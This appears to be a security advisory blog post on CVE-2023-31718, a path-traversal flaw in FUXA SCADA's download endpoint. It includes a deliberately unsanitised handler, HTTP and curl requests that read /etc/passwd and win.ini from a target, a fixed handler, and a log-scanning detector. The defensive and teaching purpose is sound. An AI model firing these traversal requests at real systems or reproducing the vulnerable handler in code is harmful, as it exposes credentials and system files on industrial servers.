CVE-2023-31718 - Local File Inclusion in FUXA <= 1.1.12 via /api/download Endpoint
FUXA is an open-source web-based SCADA (Supervisory Control and Data Acquisition) software written in Node.js, widely used for industrial process monitoring. In early 2023, a major security flaw was discovered—CVE-2023-31718—that enables attackers to read files from the server using FUXA’s /api/download endpoint. This post explains how the vulnerability works, demonstrates exploitation, and gives advice on how to secure affected systems.
What is CVE-2023-31718?
CVE-2023-31718 is a local file inclusion (LFI) vulnerability that was found in FUXA version 1.1.12 and earlier. By abusing the /api/download endpoint, attackers are able to trick the application into sending them files from anywhere on the server, including sensitive files like /etc/passwd, credentials, or environment files.
Vulnerable Code Explanation
The vulnerable code is in the route handling /api/download. It directly uses the user-supplied file path to access the file system, without proper checks or sanitization.
Here’s a simplified version of what the vulnerable code looks like:
// In routes/api/files.js (example)
// User provides 'filename' query parameter
app.get('/api/download', (req, res) => {
    const filename = req.query.filename;
    // VULNERABLE: No validation or sanitization!
    res.download(filename);
});
With this, an attacker can simply call /api/download?filename=../../../../etc/passwd to fetch sensitive files.
Suppose FUXA is running at http://victim-server:1881. The attacker sends:
GET /api/download?filename=../../../../etc/passwd HTTP/1.1
Host: victim-server:1881
With curl:
curl "http://victim-server:1881/api/download?filename=../../../../etc/passwd"
This will return the contents of /etc/passwd, proving the attack works.
For Windows targets:
curl "http://victim-server:1881/api/download?filename=../../../../windows/win.ini"
Testing It Yourself (Lab Setup)
1. Download and run FUXA 1.1.12 or earlier from https://github.com/frangoteam/FUXA/releases.
Mitigation and Fix
The vendor fixed this issue in version 1.1.13. Update FUXA to the latest version.
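Add strict validation to limit downloads to an upload directory:
const path = require('path');
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');
// `app` is the existing Express application
app.get('/api/download', (req, res) => {
    const filename = req.query.filename;
    // Reject missing or non-string values (a repeated query parameter arrives as an array)
    if (typeof filename !== 'string' || filename === '') {
        res.status(400).send('Invalid file path');
        return;
    }
    const safePath = path.resolve(UPLOAD_DIR, filename);
    // Ensure the requested file is inside the upload directory.
    // The trailing separator matters: a bare prefix check would also accept
    // a sibling directory such as "uploads-old".
    if (!safePath.startsWith(UPLOAD_DIR + path.sep)) {
        res.status(400).send('Invalid file path');
        return;
    }
    res.download(safePath);
});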
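To check whether an instance has already been probed, the same containment test can be run over web access logs. The following is an added example, not FUXA code: it assumes a reverse proxy writing combined-format logs, and BASE_DIR, the function names and the sample lines are hypothetical or constructed.

```javascript
// Added example, not FUXA code. Flags /api/download requests whose "filename" leaves BASE_DIR.
// Assumption: legitimate downloads only come from this directory (hypothetical path).
const BASE_DIR = '/opt/fuxa/uploads';

// Percent-decode a few times (bounded) so double-encoded "%252e%252e%252f" is also unwrapped.
function decodeDeep(value, rounds = 3) {
    let current = value;
    for (let i = 0; i < rounds; i++) {
        try { current = decodeURIComponent(current); } catch (e) { break; }
    }
    return current;
}

// Resolve "name" against BASE_DIR the way a POSIX path join would, collapsing "." and "..".
function resolveUnderBase(name) {
    const stack = name.startsWith('/') ? [] : BASE_DIR.split('/').filter(Boolean);
    for (const part of name.split('/')) {
        if (part === '' || part === '.') continue;
        if (part === '..') stack.pop(); else stack.push(part);
    }
    return '/' + stack.join('/');
}

// Returns the decoded filename when a log line is a download request escaping BASE_DIR, else null.
function suspiciousDownload(logLine) {
    const match = /"(?:GET|HEAD) (\/\S*) HTTP\/[\d.]+"/.exec(logLine);
    if (!match) return null;
    let url;
    try { url = new URL(match[1], 'http://log.invalid'); } catch (e) { return null; }
    if (url.pathname !== '/api/download') return null;
    const raw = url.searchParams.get('filename');
    if (raw === null) return null;
    const decoded = decodeDeep(raw).replace(/\\/g, '/');
    if (/^[a-zA-Z]:/.test(decoded)) return decoded; // Windows drive-absolute path
    return resolveUnderBase(decoded).startsWith(BASE_DIR + '/') ? null : decoded;
}

// Constructed sample lines (combined log format), not taken from a real system.
const SAMPLE_LOG = [
    '10.0.0.5 - - [22/Sep/2023:10:01:02 +0000] "GET /api/download?filename=report.pdf HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Sep/2023:10:01:07 +0000] "GET /api/download?filename=../../../../etc/passwd HTTP/1.1" 200 1874',
    '10.0.0.9 - - [22/Sep/2023:10:01:09 +0000] "GET /api/download?filename=%252e%252e%252f%252e%252e%252fwindows%252fwin.ini HTTP/1.1" 404 0',
    '10.0.0.5 - - [22/Sep/2023:10:02:11 +0000] "GET /api/download?filename=exports/../report.pdf HTTP/1.1" 200 5120',
];

const scan = (lines) => lines.map(suspiciousDownload).filter((name) => name !== null);
console.log(scan(SAMPLE_LOG));
```

A 200 response on a flagged line means the file was served, so treat anything readable by the FUXA process as disclosed.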
Conclusion
FUXA’s file download feature in versions 1.1.12 and below suffers from a critical LFI vulnerability (CVE-2023-31718). Any exposed instance is at serious risk, and admins must update immediately. Don’t expose vulnerable FUXA deployments to untrusted networks. Always sanitize user inputs and restrict file access on the server side to stay safe.
If you’re using FUXA—patch now or risk being compromised.
Timeline
Published on: 09/22/2023 00:15:00 UTC
Last modified on: 09/25/2023 16:43:00 UTC